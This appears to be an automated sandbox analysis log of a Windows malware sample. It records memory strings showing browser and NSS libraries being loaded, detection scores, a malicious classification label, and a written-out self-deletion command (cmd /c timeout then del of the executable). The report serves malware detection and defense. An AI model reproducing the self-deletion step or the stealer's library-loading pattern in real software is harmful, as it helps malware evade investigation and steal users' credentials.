Source: 1COK25f1vT.exe, 0000000C.00000003.490976694.000000001F304000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491294897.0000000020314000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.485203963.000000001F1CC000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.477468468.000000001F990000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.466563733.000000001F994000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491501790.0000000020340000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491586380.0000000020354000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.481305544.000000001F994000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.484184430.000000001F9EC000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491475649.000000002033C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.487119055.000000001F238000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.484675523.000000001F998000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491786540.00000000203A4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.487230327.000000001F364000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.482506212.000000001F994000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491708487.000000002037C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.482100861.000000001F990000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.477869582.000000001F994000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.469680104.000000001F990000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491349501.0000000020324000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.489027569.000000001F308000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.489151743.000000001F290000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.489151743.000000001F290000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.476648214.000000001F99C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491634229.0000000020368000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491619490.000000002035C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.479960511.000000001F998000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.471945444.000000001F9A4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492897666.000000001F85C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491523003.0000000020344000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.493685455.000000001F978000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491260411.0000000020308000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.490948392.000000001F1CC000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.471221878.000000001F998000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.473845022.000000001F994000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.475000686.000000001F990000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.475402246.000000001F994000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491075653.00000000202E8000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.470488936.000000001F994000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.463561095.000000001F994000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.478268008.000000001F998000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.468064054.000000001F994000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491671682.0000000020370000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491651913.000000002036C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.482913611.000000001F99C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491908994.000000001F660000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491797103.00000000203A8000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491775740.0000000020398000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491306740.0000000020318000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491545056.0000000020348000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.485153671.000000001F990000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491844346.000000001F610000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491363124.0000000020330000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491029771.00000000202E4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.478663759.000000001F998000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491836442.00000000203BC000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491109654.00000000202EC000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.471958408.000000001F99C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.514885809.000000001FB30000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000001.382378226.0000000000400000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamepleasely.exe vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.482084797.000000001F99C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.465766679.000000001F994000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491387107.0000000020334000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.462683823.00000000203C4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamenssdbm3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameucrtbase.dllj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.481283058.000000001F9A8000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491748363.0000000020388000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.483738780.000000001F990000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.480478688.000000001F99C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491439552.0000000020338000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.479481362.000000001F994000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491685778.0000000020374000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.479096628.000000001F990000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.476666229.000000001F9A0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.489216061.000000001F1EC000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491334003.0000000020320000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491806581.00000000203B4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491319974.000000002031C000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491826874.00000000203B8000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.484708142.000000001F9E4000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.472715273.000000001F9A0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamefreebl3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.484234075.000000001F998000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.490992060.00000000202E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.491243929.0000000020304000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.475799639.000000001F998000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.480866812.000000001F998000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameapisetstubj% vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll0 vs 1COK25f1vT.exe
Source: 1COK25f1vT.exe Binary or memory string: OriginalFilenamepleasely.exe vs 1COK25f1vT.exe
PE file contains strange resources
Source: 1COK25f1vT.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\1COK25f1vT.exe Section loaded: crtdll.dll Jump to behavior
Source: 1COK25f1vT.exe Virustotal: Detection: 40%
Source: 1COK25f1vT.exe ReversingLabs: Detection: 71%
Source: 1COK25f1vT.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\1COK25f1vT.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\1COK25f1vT.exe "C:\Users\user\Desktop\1COK25f1vT.exe"
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process created: C:\Users\user\Desktop\1COK25f1vT.exe "C:\Users\user\Desktop\1COK25f1vT.exe"
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "1COK25f1vT.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process created: C:\Users\user\Desktop\1COK25f1vT.exe "C:\Users\user\Desktop\1COK25f1vT.exe" Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "1COK25f1vT.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3 Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\1COK25f1vT.exe File created: C:\Users\user\AppData\Local\Temp\2fda\ Jump to behavior
Source: classification engine Classification label: mal100.rans.phis.troj.spyw.evad.winEXE@8/53@2/3
Source: C:\Users\user\Desktop\1COK25f1vT.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: 1COK25f1vT.exe, 0000000C.00000003.485757428.000000001F368000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.485890632.000000001F290000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, nss3.dll.12.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 1COK25f1vT.exe, 0000000C.00000003.487823577.000000001F1F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492773065.000000001F838000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492649482.000000001F820000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.492301830.000000001F6F0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000002.515276537.000000001FF80000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.491938965.000000001F6E0000.00000004.00000001.sdmp, 1COK25f1vT.exe, 0000000C.00000003.487925295.000000001F1CC000.00000004.00000001.sdmp, softokn3.dll.12.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
